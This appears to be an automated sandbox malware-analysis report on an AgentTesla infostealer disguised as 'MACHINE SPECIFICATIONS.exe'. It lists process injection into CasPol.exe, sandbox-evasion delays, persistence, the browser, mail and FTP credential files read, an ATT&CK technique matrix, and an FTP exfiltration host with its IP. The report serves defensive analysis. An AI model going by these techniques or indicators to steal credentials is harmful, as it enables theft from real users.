              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe TID: 5296Thread sleep count: 299 > 30Jump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe TID: 2400Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1324Thread sleep time: -7378697629483816s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2148Thread sleep count: 9649 > 30Jump to behavior
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2100Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 1116Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9649Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: CasPol.exe, 0000000A.00000003.399211019.000000000590A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05DF7BF0 LdrInitializeThunk,10_2_05DF7BF0
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000Jump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 438000Jump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 43E000Jump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 2CD008Jump to behavior
              Source: MACHINE SPECIFICATIONS.exe, C6ean/Ough6.csReference to suspicious API methods: ('Nic8', 'GetProcAddress@kernel32'), ('Ph2ne', 'VirtualProtect@kernel32.dll'), ('Joi3', 'LoadLibraryA@kernel32')
              Source: 10.0.CasPol.exe.400000.0.unpack, A/C1.csReference to suspicious API methods: ('A', 'VirtualAllocExNuma@kernel32.dll')
              Source: 10.0.CasPol.exe.400000.0.unpack, A/e2.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 10.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000A.00000000.345984518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.768390327.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 688, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: Yara matchFile source: 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.768390327.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 688, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 10.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000A.00000000.345984518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.768390327.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 688, type: MEMORYSTR
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts211
              Windows Management Instrumentation
              1
              Registry Run Keys / Startup Folder
              211
              Process Injection
              1
              Disable or Modify Tools
              2
              OS Credential Dumping
              114
              System Information Discovery
              Remote Services11
              Archive Collected Data
              1
              Exfiltration Over Alternative Protocol
              1
              Ingress Tool Transfer
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts1
              Native API
              Boot or Logon Initialization Scripts1
              Registry Run Keys / Startup Folder
              1
              Deobfuscate/Decode Files or Information
              11
              Input Capture
              111
              Security Software Discovery
              Remote Desktop Protocol2
              Data from Local System
              Exfiltration Over Bluetooth11
              Encrypted Channel
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
              Obfuscated Files or Information
              1
              Credentials in Registry
              1
              Process Discovery
              SMB/Windows Admin Shares1
              Email Collection
              Automated Exfiltration1
              Non-Standard Port
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)3
              Software Packing
              NTDS131
              Virtualization/Sandbox Evasion
              Distributed Component Object Model11
              Input Capture
              Scheduled Transfer2
              Non-Application Layer Protocol
              SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
              Masquerading
              LSA Secrets1
              Application Window Discovery
              SSH1
              Clipboard Data
              Data Transfer Size Limits23
              Application Layer Protocol
              Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common131
              Virtualization/Sandbox Evasion
              Cached Domain Credentials1
              Remote System Discovery
              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items211
              Process Injection
              DCSync1
              System Network Configuration Discovery
              Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
              Hidden Files and Directories
              Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              MACHINE SPECIFICATIONS.exe59%VirustotalBrowse
              MACHINE SPECIFICATIONS.exe73%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
              MACHINE SPECIFICATIONS.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\newapp\newapp.exe0%ReversingLabs
              SourceDetectionScannerLabelLinkDownload
              10.0.CasPol.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
              SourceDetectionScannerLabelLink
              api.ipify.org.herokudns.com0%VirustotalBrowse
              c-0001.c-msedge.net0%VirustotalBrowse
              ftp.electrobist.com1%VirustotalBrowse
              SourceDetectionScannerLabelLink
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
              http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
              http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
              https://api.ipify.orgftp://ftp.electrobist.comuser10%Avira URL Cloudsafe
              https://eyUBHCqVhczCNfHAY6U.org0%Avira URL Cloudsafe
              http://ftp.electrobist.com100%Avira URL Cloudmalware
              http://xgrPBN.com0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              api.ipify.org.herokudns.com
              3.220.57.224
              truefalseunknown
              c-0001.c-msedge.net
              13.107.4.50
              truefalseunknown
              ftp.electrobist.com
              51.195.62.160
              truetrueunknown
              api.ipify.org
              unknown
              unknownfalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://api.ipify.org/false
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://127.0.0.1:HTTP/1.1CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  low
                  https://api.ipify.orgCasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://eyUBHCqVhczCNfHAY6U.orgCasPol.exe, 0000000A.00000002.768390327.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.772635350.0000000002B66000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
